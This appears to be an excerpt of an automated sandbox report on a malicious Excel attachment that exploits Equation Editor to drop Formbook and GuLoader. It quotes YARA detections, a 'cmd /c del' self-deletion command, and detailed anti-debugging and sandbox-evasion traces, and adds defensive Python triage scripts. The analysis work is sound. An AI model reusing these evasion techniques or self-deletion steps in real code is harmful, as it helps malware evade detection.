      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFC30 NtOpenProcess,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFC48 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B0C40 NtGetContextThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFC60 NtMapViewOfSection,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFC90 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFD5C NtEnumerateKey,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020AFD8C NtDelayExecution,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020B1D80 NtSuspendThread,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00099D50 NtCreateFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00099E00 NtReadFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00099E80 NtClose,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00099F30 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00099D4B NtCreateFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00099DA4 NtCreateFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00099DFE NtReadFile,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00099E7A NtClose,
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00099F2B NtAllocateVirtualMemory,
      Source: Unique food order.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Users\Public\vbc.exe | Code function: String function: 1E99E2A8 appears 34 times
      Source: C:\Users\Public\vbc.exe | Code function: String function: 1EA0F970 appears 77 times
      Source: C:\Users\Public\vbc.exe | Code function: String function: 1E9E373B appears 237 times
      Source: C:\Users\Public\vbc.exe | Code function: String function: 1E9E3F92 appears 99 times
      Source: C:\Users\Public\vbc.exe | Code function: String function: 1E99DF5C appears 100 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 020BE2A8 appears 38 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 0212F970 appears 84 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 02103F92 appears 132 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 0210373B appears 245 times
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: String function: 020BDF5C appears 119 times
      Source: svchost[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: vbc.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000009.00000002.2382070172.0000000000553000.00000004.00000020.sdmp, type: MEMORY | Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Unique food order.xlsx
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVR80B.tmp
      Source: C:\Windows\SysWOW64\cmd.exe | Console Write (UTF-16 text, decoded): C:\Users\Public\vbc.exe
      Source: C:\Windows\SysWOW64\cmd.exe | Console Write (UTF-16 text, decoded): Access is denied
      Source: C:\Users\Public\vbc.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
      Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\Public\vbc.exe | File read: C:\Windows\System32\drivers\etc\hosts
      Source: Unique food order.xlsx | Virustotal: Detection: 24%
      Source: Unique food order.xlsx | ReversingLabs: Detection: 22%
      Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
      Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
      Source: unknown | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknown | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: unknown | Process created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: unknown | Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
      Source: unknown | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
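      The process-creation lines above give the whole chain: Excel hands the embedded object to Equation Editor, EQNEDT32.EXE drops and starts C:\Users\Public\vbc.exe, vbc.exe respawns itself, and a Windows system binary (NAPSTAT.EXE) later runs cmd.exe /c del to remove the dropper. As an added example (not part of this report and not Joe Sandbox code), the Python below rebuilds the process tree from such events and applies three checks that mirror the Sigma hits in the report header: any child of EQNEDT32.EXE, any executable started from a user-writable folder, and a cmd.exe /c del whose target is the image of another process in the same trace. The only PIDs the report gives are 2692 and 2868 for the two vbc.exe instances; every other PID, and which vbc.exe spawned the other, is assumed for illustration. The report lists the parents of autoconv.exe and NAPSTAT.EXE as unknown, and the events keep that.

```python
"""Process-tree triage for sandbox process-creation events.

Added example, not code from the Joe Sandbox report.  EVENTS is constructed
from the 'Process created' lines of this report; PIDs other than 2692/2868
are assumed, as is which vbc.exe instance spawned the other.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: Optional[int]   # None where the report lists the parent as 'unknown'
    image: str
    cmdline: str


EVENTS = [
    ProcEvent(1000, None, r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
              "/automation -Embedding"),
    ProcEvent(2000, None, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
              "-Embedding"),
    ProcEvent(2692, 2000, r"C:\Users\Public\vbc.exe", r"'C:\Users\Public\vbc.exe'"),
    ProcEvent(2868, 2692, r"C:\Users\Public\vbc.exe", r"'C:\Users\Public\vbc.exe'"),
    ProcEvent(3100, None, r"C:\Windows\SysWOW64\autoconv.exe", r"C:\Windows\SysWOW64\autoconv.exe"),
    ProcEvent(3200, None, r"C:\Windows\SysWOW64\NAPSTAT.EXE", r"C:\Windows\SysWOW64\NAPSTAT.EXE"),
    ProcEvent(3300, 3200, r"C:\Windows\SysWOW64\cmd.exe", r"/c del 'C:\Users\Public\vbc.exe'"),
]

# Folders a standard user can write to; a PE starting from one of them is the
# 'Executables Started in Suspicious Folder' condition from the report header.
USER_WRITABLE = ("c:\\users\\public\\", "c:\\programdata\\", "\\appdata\\local\\temp\\")
DEL_RE = re.compile(r"/c\s+del\s+'?([^']+?)'?\s*$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1]


def lineage(events: List[ProcEvent], pid: int) -> List[str]:
    """Image basenames from pid upward, until a process with no recorded parent."""
    by_pid = {e.pid: e for e in events}
    chain, cur = [], by_pid.get(pid)
    while cur is not None:
        chain.append(basename(cur.image))
        cur = by_pid.get(cur.ppid)
    return chain


def triage(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    by_pid = {e.pid: e for e in events}
    images = {e.image.lower() for e in events}
    findings = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # Equation Editor has no legitimate reason to spawn children:
        # this is the CVE-2017-11882 / CVE-2018-0802 exploitation pattern.
        if parent and basename(parent.image).lower() == "eqnedt32.exe":
            findings.append((e.pid, "eqnedt32_child"))
        if any(d in e.image.lower() for d in USER_WRITABLE):
            findings.append((e.pid, "exec_from_user_writable_dir"))
        # cmd /c del of a path that is the image of another process in the trace:
        # the payload removing its own dropper, as NAPSTAT.EXE does here.
        if basename(e.image).lower() == "cmd.exe":
            m = DEL_RE.search(e.cmdline)
            if m and m.group(1).lower() in images:
                findings.append((e.pid, "deletes_running_payload"))
    return findings


if __name__ == "__main__":
    for pid, rule in triage(EVENTS):
        print(f"{pid:5d} {rule:30s} {' <- '.join(lineage(EVENTS, pid))}")
```

      The parent-based check is the strongest of the three because it needs no allow-list: EQNEDT32.EXE is a COM server that only ever renders equations, so a child process of any kind is enough to alert on. The folder check and the self-deletion check are noisier on their own and are best used to score the same tree rather than to alert individually.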
      Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
      Source: Window Recorder | Window detected: More than 3 window changes detected
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
      Source: Unique food order.xlsx | Static file information: File size 2303488 > 1048576
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
      Source: Binary string: wntdll.pdb source: vbc.exe, NAPSTAT.EXE
      Source: Binary string: napstat.pdb source: vbc.exe, 00000005.00000002.2360415056.0000000000090000.00000004.00000001.sdmp
      Source: Unique food order.xlsx | Initial sample: OLE indicators vbamacros = False
      Source: Unique food order.xlsx | Initial sample: OLE indicators encrypted = True

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2692, type: MEMORY
      Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040984F push ecx; retf
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00409D50 push edi; ret
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00409D55 push edi; ret
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406910 pushad ; iretd
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_004069F5 push EF15CAC2h; ret
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040759B push FFFFFFC6h; ret
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406653 pushad ; iretd
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00406A98 pushfd ; ret
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_004082AF push FFFFFFDAh; ret
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040A3DA push ecx; retf
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00407FAA push esp; ret
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00407FB3 push ecx; retf
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E99DFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020BDFA1 push ecx; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_000969BB push esi; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_0008AB07 push ds; retf
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_00094E05 push ss; retf
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_0009CEA5 push eax; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_0009CEFB push eax; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_0009CEF2 push eax; ret
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_0009CF5C push eax; ret
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe

      Boot Survival:

      Drops PE files to the user root directory
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe
      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
      Source: Unique food order.xlsx | Stream path 'EncryptedPackage' entropy: 7.99991703704 (max. 8.0)

      Malware Analysis System Evasion:

      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: first address 0000000000314F7E, second address 0000000000314F7E, instructions:
          0x00000000 rdtsc
          0x00000002 mov eax, 00000001h
          0x00000007 cpuid
          0x00000009 popad
          0x0000000a call 00007FA1E43643A8h
          0x0000000f lfence
          0x00000012 mov edx, dword ptr [7FFE0014h]
          0x00000018 lfence
          0x0000001b ret
          0x0000001c sub edx, esi
          0x0000001e ret
          0x0000001f add edi, edx
          0x00000021 test ax, cx
          0x00000024 dec dword ptr [ebp+000000F8h]
          0x0000002a cmp dx, bx
          0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h
          0x00000034 jne 00007FA1E436437Eh
          0x00000036 test bx, cx
          0x00000039 test ecx, ebx
          0x0000003b test bx, cx
          0x0000003e call 00007FA1E43643ECh
          0x00000043 call 00007FA1E43643BAh
          0x00000048 lfence
          0x0000004b mov edx, dword ptr [7FFE0014h]
          0x00000051 lfence
          0x00000054 ret
          0x00000055 mov esi, edx
          0x00000057 pushad
          0x00000058 rdtsc
      Tries to detect Any.run
      Source: C:\Users\Public\vbc.exe | File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\vbc.exe | File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: vbc.exe | Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: first address 0000000000314F13, second address 0000000000314F7E, instructions:
          0x00000000 rdtsc
          0x00000002 popad
          0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h
          0x0000000d test al, bl
          0x0000000f test bx, cx
          0x00000012 test ecx, ebx
          0x00000014 test bx, cx
          0x00000017 call 00007FA1E43650BCh
          0x0000001c call 00007FA1E436508Ah
          0x00000021 lfence
          0x00000024 mov edx, dword ptr [7FFE0014h]
          0x0000002a lfence
          0x0000002d ret
          0x0000002e mov esi, edx
          0x00000030 pushad
          0x00000031 rdtsc
      Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: first address 0000000000314FA0, second address 0000000000314FA0, instructions:
          0x00000000 rdtsc
          0x00000002 lfence
          0x00000005 shl edx, 20h
          0x00000008 or edx, eax
          0x0000000a ret
          0x0000000b mov esi, edx
          0x0000000d pushad
          0x0000000e mov eax, 00000001h
          0x00000013 cpuid
          0x00000015 bt ecx, 1Fh
          0x00000019 jc 00007FA1E436548Dh
          0x0000001f popad
          0x00000020 call 00007FA1E4365161h
          0x00000025 lfence
          0x00000028 rdtsc
      Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: first address 00000000001B4FA0, second address 00000000001B4FA0, instructions:
          0x00000000 rdtsc
          0x00000002 lfence
          0x00000005 shl edx, 20h
          0x00000008 or edx, eax
          0x0000000a ret
          0x0000000b mov esi, edx
          0x0000000d pushad
          0x0000000e mov eax, 00000001h
          0x00000013 cpuid
          0x00000015 bt ecx, 1Fh
          0x00000019 jc 00007FA1E46CBC9Dh
          0x0000001f popad
          0x00000020 call 00007FA1E46CB971h
          0x00000025 lfence
          0x00000028 rdtsc
      Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: first address 00000000004098E4, second address 00000000004098EA, instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: first address 0000000000409B4E, second address 0000000000409B54, instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: first address 00000000000898E4, second address 00000000000898EA, instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | RDTSC instruction interceptor: first address 0000000000089B4E, second address 0000000000089B54, instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File opened / queried: IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0031044B rdtsc
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376 | Thread sleep time: -360000s >= -30000s
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2376 | Thread sleep time: -60000s >= -30000s
      Source: C:\Users\Public\vbc.exe TID: 3008 | Thread sleep time: -420000s >= -30000s
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
      Source: explorer.exe, 00000007.00000000.2337992936.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
      Source: explorer.exe, 00000007.00000000.2337947660.00000000041DB000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
      Source: vbc.exe | Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: explorer.exe, 00000007.00000000.2332515395.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
      Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
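      The interceptor traces above are pieces of one timing loop: one trace initialises a counter at [ebp+F8h] to 00A95F60h, another executes rdtsc, cpuid, rdtsc, reads KUSER_SHARED_DATA.SystemTime at 0x7FFE0014, accumulates the difference in edi, decrements the counter and jumps back, and a third executes cpuid leaf 1 and tests ECX bit 31, the hypervisor-present bit. As an added example (not part of this report and not Joe Sandbox code), the Python below parses such interceptor lines, recovers the loop count (0xA95F60 is 11,100,000 rounds, which is what turns a timing check into "instruction hammering" for a sandbox that single-steps or hooks every rdtsc) and flags the serialized rdtsc/cpuid/rdtsc pattern, the shared-data clock reads and the hypervisor-bit test. The three trace strings are copied from the report; the KUSER_SHARED_DATA offset names follow the public Windows layout; the rule names and field names are mine.

```python
"""Parse Joe Sandbox 'RDTSC instruction interceptor' traces and classify the check.

Added example, not part of the report.  TRACES holds the vbc.exe traces
quoted above, verbatim; rule names and the KUSER_SHARED_DATA table are mine.
"""
import re
from collections import Counter
from typing import Dict, List, Tuple

TRACES = [
    "0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+000000F8h], 00A95F60h "
    "0x0000000d test al, bl 0x0000000f test bx, cx 0x00000012 test ecx, ebx 0x00000014 test bx, cx "
    "0x00000017 call 00007FA1E43650BCh 0x0000001c call 00007FA1E436508Ah 0x00000021 lfence "
    "0x00000024 mov edx, dword ptr [7FFE0014h] 0x0000002a lfence 0x0000002d ret 0x0000002e mov esi, edx "
    "0x00000030 pushad 0x00000031 rdtsc",
    "0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad "
    "0x0000000a call 00007FA1E43643A8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] "
    "0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f add edi, edx "
    "0x00000021 test ax, cx 0x00000024 dec dword ptr [ebp+000000F8h] 0x0000002a cmp dx, bx "
    "0x0000002d cmp dword ptr [ebp+000000F8h], 00000000h 0x00000034 jne 00007FA1E436437Eh "
    "0x00000036 test bx, cx 0x00000039 test ecx, ebx 0x0000003b test bx, cx 0x0000003e call 00007FA1E43643ECh "
    "0x00000043 call 00007FA1E43643BAh 0x00000048 lfence 0x0000004b mov edx, dword ptr [7FFE0014h] "
    "0x00000051 lfence 0x00000054 ret 0x00000055 mov esi, edx 0x00000057 pushad 0x00000058 rdtsc",
    "0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret "
    "0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid "
    "0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FA1E436548Dh 0x0000001f popad 0x00000020 call 00007FA1E4365161h "
    "0x00000025 lfence 0x00000028 rdtsc",
]

# KUSER_SHARED_DATA is mapped read-only at 0x7FFE0000 in every process; these
# fields give user mode a clock without a syscall that a sandbox could hook.
KUSER_SHARED = {0x7FFE0008: "InterruptTime", 0x7FFE0014: "SystemTime", 0x7FFE0320: "TickCount"}

INSN_RE = re.compile(r"0x([0-9A-Fa-f]{8})\s+(.+?)(?=\s+0x[0-9A-Fa-f]{8}\s|\s*$)")
ABS_MEM_RE = re.compile(r"\[([0-9A-Fa-f]+)h\]")
MOV_MEM_IMM_RE = re.compile(r"mov dword ptr \[([^\]]+)\], ([0-9A-Fa-f]+)h$")
DEC_MEM_RE = re.compile(r"dec dword ptr \[([^\]]+)\]$")


def parse_trace(text: str) -> List[Tuple[int, str]]:
    """Split one interceptor line into (offset, instruction) pairs."""
    return [(int(off, 16), insn.strip()) for off, insn in INSN_RE.findall(text)]


def analyse(traces: List[str]) -> Dict[str, object]:
    mnemonics: Counter = Counter()
    shared_reads = set()
    counter_init: Dict[str, int] = {}
    counter_dec = set()
    serialized = False
    hv_bit = False
    for text in traces:
        insns = [i for _, i in parse_trace(text)]
        seen_rdtsc = seen_cpuid = False
        for idx, insn in enumerate(insns):
            mnem = insn.split()[0]
            mnemonics[mnem] += 1
            # rdtsc ... cpuid ... rdtsc: cpuid serialises execution so the delta
            # is a real measurement, and it forces a VM exit that inflates it.
            if mnem == "rdtsc":
                serialized |= seen_rdtsc and seen_cpuid
                seen_rdtsc, seen_cpuid = True, False
            elif mnem == "cpuid":
                seen_cpuid = seen_rdtsc
                # CPUID leaf 1, ECX bit 31 is the hypervisor-present bit
                if 0 < idx < len(insns) - 1 and insns[idx - 1] == "mov eax, 00000001h" \
                        and insns[idx + 1] == "bt ecx, 1Fh":
                    hv_bit = True
            for addr in ABS_MEM_RE.findall(insn):
                name = KUSER_SHARED.get(int(addr, 16))
                if name:
                    shared_reads.add(name)
            m = MOV_MEM_IMM_RE.match(insn)
            if m:
                counter_init[m.group(1)] = int(m.group(2), 16)
            m = DEC_MEM_RE.match(insn)
            if m:
                counter_dec.add(m.group(1))
    # A slot written with an immediate in one trace and decremented in another
    # is the loop counter; its initial value is the number of timing rounds.
    loops = {slot: n for slot, n in counter_init.items() if slot in counter_dec}
    return {
        "rdtsc": mnemonics["rdtsc"],
        "cpuid": mnemonics["cpuid"],
        "serialized_timing": serialized,
        "kuser_shared_reads": shared_reads,
        "loops": loops,
        "hypervisor_bit_check": hv_bit,
    }


if __name__ == "__main__":
    for key, value in analyse(TRACES).items():
        print(f"{key:22s} {value}")
```

      The loop count is the number an analyst wants: 11.1 million rounds of rdtsc plus cpuid is cheap on bare metal but takes minutes under an instruction-level emulator or an rdtsc hook, so patching the counter to a small value is the usual way to get past it in a debugger. The hypervisor bit is a separate check, and hiding it (most hypervisors can mask CPUID.1:ECX[31]) does nothing about the timing loop.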

      Anti Debugging:

      Contains functionality to hide a thread from the debugger
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0031044B NtSetInformationThread 000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00310570,00000000,00000000,00000000,00000000
      Hides threads from debuggers
      Source: C:\Users\Public\vbc.exe | Thread information set: HideFromDebugger
      Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process queried: DebugPort
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_0031044B rdtsc
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00312F56 LdrInitializeThunk,
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003154F4 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00311C16 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00314802 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00314CBB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00315531 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_003129C8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00311E09 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 4_2_00311721 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_1E9A26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B4802 mov eax, dword ptr fs:[00000030h]
